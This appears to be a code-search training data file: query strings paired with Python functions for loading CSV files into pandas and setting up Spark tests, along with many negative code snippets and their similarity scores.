[ "0.71430475", "0.71430475", "0.71430475", "0.713435", "0.70688635", "0.70688635", "0.7052796", "0.7049518", "0.70298177", "0.68070155", "0.6778134", "0.676388", "0.6760103", "0.67364126", "0.6710347", "0.6696243", "0.65825963", "0.65547544", "0.6525561", "0.6517765", "0.6516343", "0.6463633", "0.6456279", "0.6439273", "0.6430638", "0.64223105", "0.6402939", "0.6390908", "0.63742155", "0.6366158", "0.6364587", "0.6356202", "0.6342152", "0.6339702", "0.633855", "0.6310263", "0.62981975", "0.62981975", "0.6297412", "0.6296653", "0.6286622", "0.6278941", "0.62722856", "0.62707883", "0.626703", "0.62638384", "0.62167066", "0.6195221", "0.6187014", "0.6180172", "0.61320746", "0.61239886", "0.61221564", "0.6121268", "0.61152345", "0.6097673", "0.608591", "0.6067848", "0.60626745", "0.60571706", "0.60425234", "0.60304576", "0.60136944", "0.6012409", "0.6010371", "0.60073864", "0.60073864", "0.6004825", "0.599004", "0.59846157", "0.59776944", "0.5965587", "0.5965587", "0.59547967", "0.59537125", "0.5950786", "0.59504676", "0.59488785", "0.5942756", "0.5940839", "0.5939532", "0.5939532", "0.5938894", "0.59365904", "0.59081244", "0.59048456", "0.59005886", "0.5899809", "0.58890074", "0.5888346", "0.5884531", "0.58824086", "0.5872415", "0.5871111", "0.58604205", "0.5859741", "0.5856319", "0.5854553" ]
0.73182416
0
Load csv data into pandas
def load_data(filename): # Load the necessary columns from the csv into pandas data = pd.read_csv(filename, sep=';') # Cleans the data data = data[["Perioden", "Regio's",\ "Kerkelijke gezindte/Geen kerkelijke gezindte (% van de bevolking)",\ "Kerkelijke gezindte/Totaal kerkelijke gezindte (% van de bevolking)",\ "Kerkelijke gezindte/Rooms-Katholiek (% van de bevolking)",\ "Kerkelijke gezindte/Protestantse Kerk in Nederland (% van de bevolking)",\ "Kerkelijke gezindte/Nederlands Hervormd (% van de bevolking)",\ "Kerkelijke gezindte/Gereformeerd (% van de bevolking)",\ "Kerkelijke gezindte/Islam (% van de bevolking)",\ "Kerkelijke gezindte/Overige gezindte (% van de bevolking)"]] # Creates new columns for renaming purposes data["Year"] = data["Perioden"] data["Region"] = data["Regio's"] data["Athiest"] = data["Kerkelijke gezindte/Geen kerkelijke gezindte (% van de bevolking)"] data["Total"] = data["Kerkelijke gezindte/Totaal kerkelijke gezindte (% van de bevolking)"] data["Roman Catholic"] = data["Kerkelijke gezindte/Rooms-Katholiek (% van de bevolking)"] data["Protestant"] = data["Kerkelijke gezindte/Protestantse Kerk in Nederland (% van de bevolking)"] data["Dutch Reformed"] = data["Kerkelijke gezindte/Nederlands Hervormd (% van de bevolking)"] data["Reformed"] = data["Kerkelijke gezindte/Gereformeerd (% van de bevolking)"] data["Islam"] = data["Kerkelijke gezindte/Islam (% van de bevolking)"] data["Other"] = data["Kerkelijke gezindte/Overige gezindte (% van de bevolking)"] # Deletes doubles data.drop(data.columns[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]], axis = 1, inplace=True) data = data.set_index("Region") print(data) return data
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def data_from_csv(self, filepath):\n self.dataframe = pd.load_csv(filepath, separator='')", "def load_data(csv_path):\n df = pd.read_csv(csv_path)\n return df", "def _parse_csv(csv_file: str) -> pd.DataFrame:\n return pd.read_csv(csv_file, header=0)", "def load_from_csv(path, delimiter=','):\n return pd.read_csv(path,encoding = \"ISO-8859-1\",dtype=object)", "def import_data(csv_file):\n # skips bad lines\n data = pd.read_csv(csv_file, error_bad_lines=False)\n return data", "def read_csv_data(csv_path):\n\n return pd.read_csv(csv_path, sep=',', engine='python')", "def csv_to_df(self, path=None):\n # reads the csv file and puts it to the dataframe\n df = pd.read_csv(path)\n return df", "def load_csv():\n df = pd.read_csv(datafolder+filename, decimal=decimal).astype(\n {'min': 'float', 'max': 'float'})\n return df", "def from_csv(self, path_to_load):\n import pandas as pd\n\n df = pd.read_csv(path_to_load)\n df = df.loc[:, ~df.columns.str.contains('^Unnamed')] # Remove unnnamed\n\n self.results['cids'] = list()\n self.results['differences'] = list()\n self.results['experimental_values'] = list()\n\n pd_dict = df.to_dict()\n length = len(pd_dict['cids'])\n for cid in [pd_dict['cids'][i] for i in range(0, length)]:\n self._results['cids'].append(cid)\n for cid in [pd_dict['differences'][i] for i in range(0, length)]:\n self._results['differences'].append(cid)\n for cid in [pd_dict['experimental_values'][i]\n for i in range(0, length)]:\n self._results['experimental_values'].append(cid)", "def _csv_to_df(csv_path, headers):\n\n # Assume all columns are strings\n columns_types = {i: str for i, header in enumerate(headers)}\n\n temp_df = pd.read_csv(csv_path, converters=columns_types, skip_blank_lines=False)\n # TODO: check that there are only two columns of type string, then convert to our format\n temp_df.columns = headers\n # Add the column split, this is all training data\n temp_df['annotation_unit_id'] = None\n return temp_df", "def from_csv(self,path):\n self.csv_path = path\n\n try:\n fh = open(self.csv_path, \"r\")\n except IOError:\n print(\"Error: no such file or directory\") \n\n self.csv_dataframe = pd.DataFrame(pd.read_csv(self.csv_path, header=0, keep_default_na=False)).dropna(axis=0, how='any')\n test = pd.DataFrame(pd.read_csv(self.csv_path)).dropna(axis=0, how='any')\n types = [0 for i in range(len(test.dtypes))]\n a = fh.readline()\n a = a[:-1] # remove '\\n'\n x = a.split(',') # x stores the name of each column\n fh.close()\n\n #type transformation\n for i in range(len(test.dtypes)):\n if test.dtypes[i].name[0:3] == 'int' or test.dtypes[i].name[0:5] == 'float':\n if (x[i][0] == \"'\" or x[i][0] == '\"'):\n x[i] = x[i].replace('\\'', '').replace('\"', '')\n for j in test[x[i]]:\n if not (j == 0 or (j > 1000 and j < 2100)):\n types[i] = test.dtypes[i].name[0:5]\n break\n else:\n types[i] = 'year'\n elif test.dtypes[i].name[0:6] == 'object':\n if (x[i][0] == \"'\" or x[i][0] == '\"'):\n x[i] = x[i].replace('\\'', '').replace('\"', '')\n for j in test[x[i]]:\n if j != 0 and not(re.search(r'\\d+[/-]\\d+[/-]\\d+', j)):\n types[i] = 'varchar'\n break\n else:\n types[i] = 'date'\n \n name = path.rsplit('/', 1)[-1][:-4]\n self.table_info(name, x, types)\n self.import_method = methods_of_import[2] # = 'csv'\n\n self.show_csv_info()", "def importData(filename):\r\n data = pd.read_csv(filename)\r\n return data", "def read_data_from_csv(filename):\n df = pd.read_csv(filename)\n return df", "def read_csv(path):\n return pd.read_csv(path)", "def read_csv(csv_path):\n \n df = pd.read_csv(csv_path)\n\n return df", "def _load_csv_into_df(csv_file: Any, csv_name: str) -> pd.DataFrame:\n try:\n df = pd.read_csv(csv_file, sep=\"|\", header=0, dtype=str, encoding=\"UTF-8\")\n except ValueError as e:\n print(f\"ERROR! Could not read the file {csv_name}: {e}\")\n raise\n return df", "def _load_stored_csv(path: Union[Path, str]) -> Union[pd.DataFrame, pd.Series]:\n data = pd.read_csv(path, index_col=0, parse_dates=[0]).round(12)\n data.index = data.index.tz_convert(REFERENCE_TZ)\n return data", "def read_csv():", "def csv_loader(csv_file):\n df = pd.read_csv(csv_file, sep=';', parse_dates=['Data_Alteraçao'])\n pd.set_option('display.float_format', '{:.0f}'.format)\n\n df = df.fillna(0)\n df = df.drop(columns=['Cod. Pareamento', 'Cod. UF', 'Sigla UF', 'Cod. Subarea',\n 'Nome Subarea', 'Cod. Municipio', 'Nome Municipio', 'Codigo Agencia',\n 'Nome Agencia', 'Cod. Setor', 'Cod. Logradouro CNEFE',\n 'Tipo Logradouro CNEFE', 'Titulo Logradouro CNEFE',\n 'Nome Logradouro CNEFE', 'Nome Tratado CNEFE', 'Tipo Logradouro DNE',\n 'Titulo Logradouro DNE', 'Nome Logradouro DNE', 'Nome Tratado DNE',\n 'Logradouro Completo DNE', 'Distancia', 'Cod. Match', 'Motivo Match',\n 'CEPs Face', 'Localidade Face',\n 'Alterar Logradouro para DNE?', 'Observaçao', 'SIAPE Alteração',\n 'Nome Alteraçao', 'Data_Alteraçao', 'Status', 'Unnamed: 33'])\n\n # df.astype({'CEP Logradouro CNEFE': 'int32'}).dtypes\n\n df['CEP'] = df['CEP'].str.replace(' ', '', regex=False)\n\n ceps_dne = []\n for index, row in df.iterrows():\n if type(row.CEP) == str:\n for cep in row.CEP.split(','):\n # print(index, cep)\n ceps_dne.append(int(cep))\n\n ceps_cnefe = df['CEP Logradouro CNEFE'].astype(int).tolist()\n ceps = ceps_dne + ceps_cnefe\n ceps = list(set(ceps))\n return pd.Series(ceps)", "def loadData(path):\n try:\n return pd.read_csv(path)\n except Exception as e:\n raise Exception(\"Could not read df, possbily incorrect path: {}\".format(e))", "def load_data(file_path):\n data = pandas.read_csv(file_path)\n\n return data", "def load_csv(self):\n self.database = pd.read_csv(\n self.settings['database_path'],\n encoding='utf-8')", "def read_from_csv(path):\n if not os.path.exists(path):\n return None\n if not path.endswith('.csv'):\n return None\n\n with open(path, 'r') as file:\n data = pd.read_csv(file, header=0)\n\n return data", "def load_data_csv():\r\n \r\n # Load lookup table\r\n path = 'data/id_lookup.csv'\r\n lookup_table = pd.read_csv(path, index_col=0)\r\n\r\n # Load song data\r\n path2 = 'data/data_lyrics_features.csv'\r\n data = pd.read_csv(path2, index_col=0)\r\n\r\n return data, lookup_table", "def _loadCSVFile(self):\n self._df = pd.read_csv(\n self._pathfile, sep=CSV_SEPARATOR, index_col=CSV_INDEX_COL)", "def import_data(catalog='xmatch_TGAS_Simbad.csv', params=None, nrows=None, delimiter=','):\n print \"Loading %s and creating DataFrame..\" % catalog\n df_imported = pd.read_csv(catalog, delimiter=delimiter, header=0, usecols=params, nrows=nrows)\n print \"..Done\\n----------\"\n return df_imported", "def read_csv(self) -> None:\n\n self._df = pd.read_csv(self._dataset_file)", "def read_data(path):\n data = pd.read_csv(path)\n return data", "def read_data(path):\n data = pd.read_csv(path)\n return data", "def get_csv_data(csv_path: str, img_dir: str) -> pd.DataFrame:\r\n data = pd.read_csv(csv_path)\r\n data['title'] = data['title'].apply(preprocess_titles)\r\n data['image'] = data['image'].apply(abs_path, args=(img_dir,))\r\n return data", "def read_data(filepath):\n df = pd.read_csv(filepath)\n return df", "def read_data(filepath):\n df = pd.read_csv(filepath)\n return df", "def read_data(filepath):\n df = pd.read_csv(filepath)\n return df", "def from_csv(self, path):\n for model, table in [(self.Dataset, 'dataset'),\n (self.Datarun, 'datarun'),\n (self.Hyperpartition, 'hyperpartition'),\n (self.Classifier, 'classifier')]:\n df = pd.read_csv(os.path.join(path, '%ss.csv' % table))\n\n # parse datetime columns. This is necessary because SQLAlchemy can't\n # interpret strings as datetimes on its own.\n # yes, this is the easiest way to do it\n for c in inspect(model).attrs:\n if type(c) != ColumnProperty:\n continue\n col = c.columns[0]\n if type(col.type) == DateTime:\n df[c.key] = pd.to_datetime(df[c.key],\n infer_datetime_format=True)\n\n for _, r in df.iterrows():\n # replace NaN and NaT with None\n for k, v in list(r.iteritems()):\n if pd.isnull(v):\n r[k] = None\n\n # insert the row into the database\n create_func = getattr(self, 'create_%s' % table)\n create_func(**r)", "def load(self):\n data = pandas.read_csv(self.path, names=self.names)\n return data", "def _get_df_from_csv(self, filename):\n df = pd.read_csv(filename)\n df.set_index('Date', drop=True, inplace=True)\n df.index = pd.to_datetime(df.index)\n return df", "def create_dataframe_from_csv(path_to_csv_file):\r\n df = pd.read_csv(path_to_csv_file)\r\n return df", "def get_data(path):\n df = pd.read_csv(path)\n\n return df", "def read_data_from_csv(filename: str) -> pd.DataFrame:\n try:\n data = pd.read_csv(filename)\n return data\n except(FileNotFoundError):\n print('Error: Could not read the data from csv.')\n return None", "def _read_csv(self) -> pd.DataFrame:\n\n return pd.concat(\n [\n pd.read_csv(f, usecols=[1, 2, 3, 4, 5])\n for f in self.temp_path.iterdir()\n if f.name.endswith(\".csv\")\n ]\n )", "def read_data_csv(path):\n df = pd.read_csv(path)\n df.drop([\"Unnamed: 0\"], axis=1, inplace=True)\n return df", "def import_data():\n\tif os.path.exists(\"log.csv\"):\n\t\t#print (\"--training data imported to data frame\\n\")\n\t\tdf = pd.read_csv(\"log.csv\", index_col=0)\n\telse:\n\t\tprint(\"training CSV not found\")\n\t\texit()\n\t\n\treturn df", "def load_data(filepath):\n\tlogging.info(f\"Load data from {filepath}\")\n\tdf = pd.read_csv(filepath)\n\tdf = set_dtypes(df)\n\tdf = df.sort_values(by='query_date')\n\n\treturn df", "def load_data(fn):\n return pandas.read_csv(fn, dtype={'Name': str, 'Reason': str, 'Amount': float, 'Day': int})", "def load(self, path):\n self.df = pd.read_csv(path)\n print(\"Loaded data from {}\".format(path))", "def _csv2df(data_file):\n df = pd.read_csv(data_file, encoding=\"ISO-8859-1\", low_memory=False)\n return df", "def load_from_csv(self):\n\n self._logger.info('Reading data coming from CSV files')\n\n sta = self.stations\n\n if sta != None:\n msta = \", \".join(sta)\n self._logger.debug('Using only stations {0}'.format(msta))\n\n # load the data\n v = list(self.variables)\n v.append('metadata')\n for i in v:\n if i in self.dataConfig:\n\n self._logger.debug('Reading %s...' % self.dataConfig[i])\n if i == 'metadata':\n dp_final = pd.read_csv(self.dataConfig[i],\n index_col='primary_id')\n #Ensure all stations are all caps.\n dp_final.index = [s.upper() for s in dp_final.index]\n\n elif self.dataConfig[i]:\n dp_full = pd.read_csv(self.dataConfig[i],\n index_col='date_time',\n parse_dates=[0])\n dp_full.columns = [s.upper() for s in dp_full.columns]\n\n if sta is not None:\n\n data_sta = dp_full.columns.str.upper()\n\n # Grab IDs from user list thats also in Data\n self.stations = [s for s in data_sta if s in sta]\n dp = dp_full[dp_full.columns[(data_sta).isin(sta)]]\n\n else:\n dp = dp_full\n\n # Only get the desired dates\n dp_final = dp[self.start_date:self.end_date]\n\n if dp_final.empty:\n raise Exception(\"No CSV data found for {0}\"\n \"\".format(i))\n\n setattr(self, i, dp_final)", "def read_csv_data(url):\n\n csv_data = pd.read_csv(url)\n\n return csv_data", "def read_traffic_sensor_from_csv(path: str) -> pd.DataFrame:\n\n df = pd.read_csv(path)\n df[\"measuredTime\"] = pd.to_datetime(df[\"measuredTime\"])\n df.set_index(\"measuredTime\", inplace=True)\n return df", "def data_import(path):\n train_path = os.path.join(path, \"train.csv\")\n test_path = os.path.join(path, \"test.csv\")\n df_train = pd.read_csv(train_path)\n df_test = pd.read_csv(test_path)\n return df_train, df_test", "def load_to_dataframe(self) -> DataFrame:\n return read_csv(self._csv_path, converters={\n # Check if embedding size is the empty string,\n # as it would be for Count models\n \"Embedding size\": lambda v: int(float(v)) if len(v) > 0 else nan\n })", "def import_data():\n import pandas as pd\n \n df = pd.read_csv('Company_Bankruptcy_Prediction.csv')\n return df", "def read_csv():\n csv_file = \"dow.csv\"\n\n # read the data from the csv file, parsing the Dates to make the x-axis, setting index_col to zero to remove it\n data_frame = pd.read_csv(csv_file, parse_dates=True, index_col=0)\n return data_frame", "def read_csv_ur10(self, csv_file):\r\n df = pd.read_csv(csv_file, sep=';', decimal=',', header=0)\r\n return df", "def read_load_data_from_csv(csv_path):\n # Load the original DataFrame, use easier-to-read column names, and drop unnecessary column\n original_df = pd.read_csv(csv_path).rename(columns={\"OperDay\" : \"Date\"}).drop([\"TOTAL\", \"DSTFlag\"],axis=1)\n\n original_df.name = csv_path.split(\"_\")[1]\n\n # Combine the originally separate date and hour columns into a single DateTime column\n return combine_date_and_hour_columns(original_df)", "def get_raw_data_from_csv():\n data_df = pd.read_csv(static_constants.RAW_DATA_PATH)\n return data_df", "def load_data(path):\n\n columns = ['Item Year', 'Original Value', 'Standard Value', 'Original Currency',\n 'Standard Currency', 'Orignal Measure', 'Standard Measure', 'Location',\n 'Commodity']\n col_type = [int, float, float, object, object, object, object, object]\n\n col_type_dict = dict(zip(columns, col_type))\n\n au_df = pd.read_csv(path, usecols=columns)\n au_df = au_df.astype(col_type_dict)\n au_df.name = 'AU_data'\n \n return au_df, columns", "def import_csv_dataset():\n import_fields = pd.read_csv('redacted-2020-june-30-wprdc-.csv', header=None).to_numpy()[0, :]\n import_values = pd.read_csv('redacted-2020-june-30-wprdc-.csv').to_numpy()\n import_values = clean_values(import_values)\n return import_fields, import_values", "def dataset_from_csv(self, filename, time_column='point_in_time'):\n return pd.from_csv(filename, parse_dates=[time_column])", "def load_image_metadata(path_to_data_csv: str) -> pd.DataFrame:\n return pd.read_csv(path_to_data_csv)", "def from_csv(cls, name, csv, **kwargs):\r\n data = pd.read_csv(csv, **kwargs)\r\n return Dataset(name, data, **kwargs)", "def _load_csv(root_path, table_meta):\n relative_path = os.path.join(root_path, table_meta['path'])\n dtypes = _read_csv_dtypes(table_meta)\n\n data = pd.read_csv(relative_path, dtype=dtypes)\n data = _parse_dtypes(data, table_meta)\n\n return data", "def read_csv(self, csv_file):\n mylog.debug('Reading csv file %s for data' % csv_file)\n csv_data = pandas.read_csv(csv_file)\n mylog.debug('Read of csv file complete.')\n #mylog.debug('%s' % csv_data)\n #sometimes the csv has an empty dataframe #\n if csv_data.empty:\n mylog.debug('Data frame is empty; repopuating data')\n csv_info = []\n for item in csv_data:\n #add the data one cell at a time to the list #\n #for some reason, some csvs have the data #\n #with random decimal points #\n csv_info.append(item.split(\".\")[0])\n df = pandas.DataFrame(columns=csv_info)\n df.loc[0]=csv_info\n #write the data from the list back into the cells#\n #one at a time #\n for column in range(0, len(csv_info)): \n df.iloc[0,column] = csv_info[column]\n csv_data = df \n return csv_data", "def import_data():\n data = pd.read_csv('partA/bikes_October18.csv', ',')\n return data", "def _csv_engine(filename, node):\n sep = node.get(\"sep\", \",\")\n header = node.get(\"header\", 0)\n logger.debug(\n \"Parsing CSV '{}'. sep={}, header={}.\".format(filename, sep, header)\n )\n index = node.get(\"index\")\n encoding = node.get(\"encoding\")\n if not index:\n raise InvalidConfig(\"An 'index' column is required. It should \"\n \"be the sample id column.\")\n\n df = pd.read_csv(filename, sep=sep, header=header, encoding=encoding)\n df.set_index(index, verify_integrity=True, inplace=True, drop=True)\n df.index = df.index.astype(str)\n\n return df", "def get_data_from_csv_full_path(filepath, datatypes, date_column_list):\n\n dataframe = pandas.read_csv(filepath, dtype=datatypes, date_parser=pandas.to_datetime, parse_dates=date_column_list)\n\n return dataframe", "def load_dataset_from(csv_file: str) -> pd.DataFrame:\n\n print(\">>> LOADING DATASET FROM FILE {filename}\".format(filename=csv_file))\n if not csv_file.endswith(\".csv\"):\n print(\"File has to be CSV type file!\")\n exit(1)\n\n try:\n data = pd.read_csv(csv_file)\n print(\">>> Finished loading data!\")\n return data\n except FileNotFoundError:\n print(\"File couldn't be found. Verify if '{f_path}' is a correct file path!\".format(f_path=csv_file))\n exit(1)", "def load_data(input_file):\n print('loading file:', input_file)\n df = pd.DataFrame()\n show_progress = make_show_progress()\n chunk_iterator = pd.read_csv(input_file,\n compression='gzip',\n chunksize=100_000,\n index_col=0,\n usecols=cols_to_use,\n dtype=data_types,\n parse_dates=dates_to_parse,\n infer_datetime_format=True\n )\n for chunk in chunk_iterator:\n df = pd.concat([df, chunk])\n show_progress(len(chunk))\n return df", "def read(self):\n \n self.df = pd.read_csv(self.path, encoding = \"ISO-8859-1\")", "def read_csv(self, path):\n for file in os.listdir(path):\n if file[-4:] == \".csv\":\n name = file[:-4]\n table_index_header = cfg.get_list(\"table_index_header\", name)\n filename = os.path.join(path, file)\n self.input_data[name] = pd.read_csv(\n filename,\n index_col=list(range(int(table_index_header[0]))),\n header=list(range(int(table_index_header[1]))),\n squeeze=(\"series\" not in name),\n )\n self.check_input_data(warning=False)\n self.add_meta_data()\n return self", "def load() -> DataFrame:\n return load_file(__file__, \"default.csv.gz\")", "def load_data():\n domain_data_path = os.path.join(DOMAIN_DATA_DIR, DOMAIN_DATA_FILENAME)\n df = pd.read_csv(\n domain_data_path,\n sep=\",\",\n header=0,\n index_col=False,\n )\n return df", "def loadCSV(input_file):", "def load(self, path, separator=\",\", header_type=\"infer\", nrows=None,\n skiprows=None, usecols=None):\n\n return pd.read_csv(path, header=header_type, sep=separator,\n usecols=usecols, nrows=nrows, skiprows=skiprows)", "def reader(self):\n df = pd.read_csv(self.path)\n return df", "def loadData(path_file):\n data = pd.read_csv(path_file) \n data.head()\n return data", "def from_csv(cls, filename, pulse_number=None):\n df = pd.read_csv(filename)\n return cls._sort_and_filter_dataframe(df, pulse_number)", "def read_partslist_csv(csv: str)->pd.DataFrame:\n try:\n p_df = pd.read_csv(csv, sep='\\t', header=0, engine='python', na_values='', skipfooter=3,\n dtype={'BLItemNo': str, 'BLColorId': int, 'LDrawColorId': int, 'Qty': int})\n p_df = p_df.fillna({'BLColorId': '', 'Qty': 0})\n p_df = p_df.rename(mapper={'BLItemNo': 'ItemId', 'BLColorId': 'Color'}, axis=1)\n p_df = p_df.drop(columns=['ElementId', 'LdrawId', 'LDrawColorId'])\n return p_df\n except FileNotFoundError as e:\n print(e)\n return pd.DataFrame()", "def create_dataframe():\r\n\r\n df = pd.read_csv('data/data.csv', header=0)\r\n return df", "def _load(self, config: Dict):\n return pd.read_csv(config['path'])", "def load_data(filepath):\n\n file_path_casted = Path(filepath)\n if not file_path_casted.exists():\n raise FileNotFoundError(\"File does not exist.\")\n\n data = pd.read_csv(filepath, delimiter=\",\")\n\n return data", "def get_data(filename):\r\n return pd.read_csv(filename)", "def load_symbol_universe_data_from_csv(self, csv_fullpath):\n\n print(\"[{}] [INFO] Loading symbol universe data from csv...\".format(datetime.now().isoformat()))\n\n df = pd.read_csv(csv_fullpath)\n\n #--------------------------------------------------------------------------\n # Convert date column to type numpy datetime64.\n #--------------------------------------------------------------------------\n df.date = pd.to_datetime(df.date)\n\n return df", "def read_dataset():\n\n df = pd.read_csv('fake_job_postings.csv', index_col='job_id')\n return df", "def import_dataset(fpath):\r\n data = read_csv(fpath)\r\n print(data.head())\r\n print(data.shape)\r\n return data", "def load_data(sourcedatafile):\n with open(sourcedatafile, \"r\") as infile:\n data = pd.read_csv(infile, sep=\",\", encoding=\"utf8\", index_col=False)\n return data", "def load_data(txt_path: str = RAW_TXT) -> pd.DataFrame:\n df = pd.read_csv(txt_path)[INDICES]\n return df", "def initialize_from_file(filename):\r\n df = pd.read_csv(filename)\r\n return df", "def get_training_data(self, csv_path):\n data = pd.read_csv(csv_path)\n data[['Hashrate', 'Addresses', 'Supply', 'Trx_Fee', 'Daily_Trx']] = data[['Hashrate', 'Addresses', 'Supply', 'Trx_Fee', 'Daily_Trx']].apply(pd.to_numeric)\n data[['Timestamp']] = data[['Timestamp']].apply(pd.to_datetime)\n data = data[data['Timestamp'] < self.end_time]\n data = data[data['Timestamp'] > self.start_time]\n\n return data", "def load_data(path):\n try:\n data = pd.read_csv(path, sep='\\t')\n except FileNotFoundError:\n logger.exception(\"Traceback of data file '{}' not found.\".format(path))\n else:\n return data", "def load_log(dir_):\n df = pandas.read_csv(os.path.join(dir_, 'log.csv'),\n error_bad_lines=False,\n warn_bad_lines=True)\n if not len(df):\n print(\"empty df at {}\".format(dir_))\n return\n df['model'] = dir_\n return df", "def load_pandas():\n data = _get_data()\n return du.process_pandas(data, endog_idx=0)", "def load_pandas():\n data = _get_data()\n return du.process_pandas(data, endog_idx=0)", "def import_data(file):\n df = pd.read_csv(file, parse_dates=True, keep_date_col=True, sep=';')\n df = reduce_mem_usage(df)\n return df", "def csv_data_loader(path):\n\n logging.info(\"Loading file using SparkSession\")\n csvload = Spark.instance.spark() \\\n .read \\\n .format(\"csv\") \\\n .options(header=True) \\\n .options(mode=\"DROPMALFORMED\")\n\n return csvload.option(\"inferSchema\", \"true\").load(path)", "def read_data(self) -> pd.DataFrame:\n data = pd.read_csv(self.data_path)\n assert isinstance(data, pd.DataFrame)\n return data", "def read_data(self) -> pd.DataFrame:\n data = pd.read_csv(self.data_path)\n assert isinstance(data, pd.DataFrame)\n return data", "def read_csv(\n csv_file: str,\n header: Optional[Union[str, int, Sequence]] = 'infer',\n names: Optional[Sequence] = None) -> pd.DataFrame:\n\n if header is None and not names:\n names = constants.IMAGE_CSV_COLUMNS\n\n with tf.io.gfile.GFile(csv_file) as f:\n return pd.read_csv(f, names=names, header=header)", "def load(self) -> pd.DataFrame:\n if os.path.exists(self.file_name):\n df = pd.read_csv(self.file_name, index_col=0)\n df = self._clean(df)\n else:\n _LOG.debug(\"No file '%s'\", self.file_name)\n df = pd.DataFrame()\n return df", "def get_dataset(filepath):\n return pandas.read_csv(filepath, header='infer')", "def read_csv_to_dataframe(file_name):\n df = pd.read_csv(file_name)\n df = df.drop(['Unnamed: 0'], axis=1)\n return df" ]
[ "0.7997091", "0.76976955", "0.7580888", "0.75562894", "0.7530883", "0.75125337", "0.7335565", "0.7333322", "0.73209023", "0.72114277", "0.7200636", "0.71992266", "0.7190701", "0.71325487", "0.7120215", "0.71044284", "0.7094358", "0.7092082", "0.7048781", "0.70392513", "0.70304245", "0.7029713", "0.7028822", "0.70284164", "0.7022717", "0.70126516", "0.70021653", "0.6982259", "0.6982259", "0.6981705", "0.6980921", "0.6980921", "0.6980921", "0.69584364", "0.6952076", "0.6923535", "0.691536", "0.6913593", "0.6911689", "0.6909517", "0.69074506", "0.68760824", "0.68605506", "0.6852409", "0.6851214", "0.68451864", "0.6838844", "0.6836003", "0.68254226", "0.68247235", "0.6818571", "0.6817708", "0.6816959", "0.68107253", "0.6808245", "0.68059665", "0.6803133", "0.67891383", "0.6774891", "0.67747384", "0.6765674", "0.6756252", "0.67422557", "0.67342293", "0.67326105", "0.6730598", "0.6723805", "0.669369", "0.6690874", "0.6679025", "0.6675615", "0.6675264", "0.6670421", "0.6665945", "0.6665666", "0.6660609", "0.6654588", "0.664241", "0.6620393", "0.66029483", "0.6602152", "0.6574313", "0.65717936", "0.6551437", "0.65458435", "0.6534046", "0.6532417", "0.6528763", "0.65226275", "0.65220904", "0.6521562", "0.65150064", "0.65150064", "0.65104747", "0.6496992", "0.6495031", "0.6495031", "0.64911705", "0.6484918", "0.6483133", "0.6471677" ]
0.0
-1
Start Spark, define config and path to test data
def setUp(self): self.test_data_path = 'testing/test_data/'
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def setUp(self):\n self.spark, self.log, self.config = start_spark(app_name = \"test_etl_job\",\n files='configs/etl_config.json')", "def setUp(self):\n with open(SRC_PATH + \"configs/etl_config.json\", \"r\") as f:\n self.config = json.loads(f.read())\n self.spark = SparkBuilder(\"test\").build_sc()\n self.test_data_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), '../tests/test_data/')", "def spark():\n\n quiet_log4j()\n\n builder = (\n SparkSession.builder\n .master(\"local[2]\")\n .appName(\"pytest-pyspark-local-testing\")\n # By default spark will shuffle to 200 partitions, which is\n # way too many for our small test cases. This cuts execution\n # time of the tests in half.\n .config('spark.sql.shuffle.partitions', 4)\n )\n if 'XDG_CACHE_HOME' in os.environ:\n builder.config('spark.jars.ivy', os.path.join(os.environ['XDG_CACHE_HOME'], 'ivy2'))\n\n with builder.getOrCreate() as spark:\n yield spark", "def main():\n\n print(\"Initiating Spark session...\")\n print('-' * 50)\n spark = create_spark_session()\n \n # Use these settings if you want to test on the full\n # dataset, but it takes a LONG time.\n song_input_data = config['AWS']['SONG_DATA']\n log_input_data = config['AWS']['LOG_DATA']\n \n # Uncomment the two lines if you want to test on\n # minimal data\n #song_input_data = config['AWS']['SINGLE_SONG_DATA']\n #log_input_data = config['AWS']['SINGLE_LOG_DATA']\n \n output_data = config['AWS']['OUTPUT_DATA']\n \n print('-' * 50)\n print(\"Processing song data...\")\n print('-' * 50)\n print('')\n process_song_data(spark, song_input_data, output_data)\n \n print('-' * 50) \n print(\"Processing log data...\")\n print('-' * 50)\n print('')\n process_log_data(spark, song_input_data, log_input_data, output_data)", "def main():\n spark = create_spark_session()\n\n input_data = config['STORAGE']['INPUT_DATA']\n output_data = config['STORAGE']['OUTPUT_DATA']\n\n process_song_data(spark, input_data, output_data)\n process_log_data(spark, input_data, output_data)", "def spark():\n return SparkSession.builder.master(\"local\").appName(\"tests\").getOrCreate()", "def session_system_dataproc(session, py):\n session.interpreter = 'python{}'.format(py)\n session.virtualenv_dirname = 'system-dataproc-{}'.format(py)\n\n session.install('pytest', 'pytest-cov', 'mock', 'numpy')\n\n try:\n import pyspark\n except:\n raise RuntimeError(\"Please install pyspark and spark clusters to run \"\n \"tests\")\n\n # setups environment to be able to see Spark cluster\n session.env = {'PYTHONPATH': (':./'\n ':/usr/local/spark/python'\n ':/usr/local/spark/python/lib/py4j-0.10.4-src.zip')}\n\n session.run(\n 'py.test',\n 'tests/system/dataproc/',\n '--cov=.',\n '--cov-config=.coveragerc',\n '--cov-report=html')", "def test_pyspark(container):\n c = container.run(\n tty=True,\n command=['start.sh', 'python', '-c', 'import pyspark']\n )\n rv = c.wait(timeout=30)\n assert rv == 0 or rv[\"StatusCode\"] == 0, \"pyspark not in PYTHONPATH\"\n logs = c.logs(stdout=True).decode('utf-8')\n LOGGER.debug(logs)", "def main():\n spark = create_spark_session()\n\n # Used for local testing - commented out\n # input_data = \"./data/\"\n # output_data = \"./data/\"\n input_data = \"s3a://udacity-dend/\"\n output_data = \"s3a://allen-lesson4-datalake-bucket/\"\n\n process_song_data(spark, input_data, output_data)\n process_log_data(spark, input_data, output_data)\n spark.stop()", "def main():\n # Initiate Spark Session\n spark = create_spark_session()\n \n # Data files\n # Root Data Path\n # Uncomment below line for AWS S3\n #input_data = \"s3a://udacity-dend\"\n # Uncomment below line for local files\n input_data = \"data\"\n\n # Warehouse\n # Root WH\n # Uncomment below line for AWS S3\n #output_data = \"s3a://jerryespn-project-out\"\n # Uncomment below line for local files\n output_data = \"spark-warehouse\"\n \n process_song_data(spark, input_data, output_data) \n process_log_data(spark, input_data, output_data)", "def spark_config_set(is_spark_submit):\n if is_spark_submit:\n global sc, sqlContext\n sc = 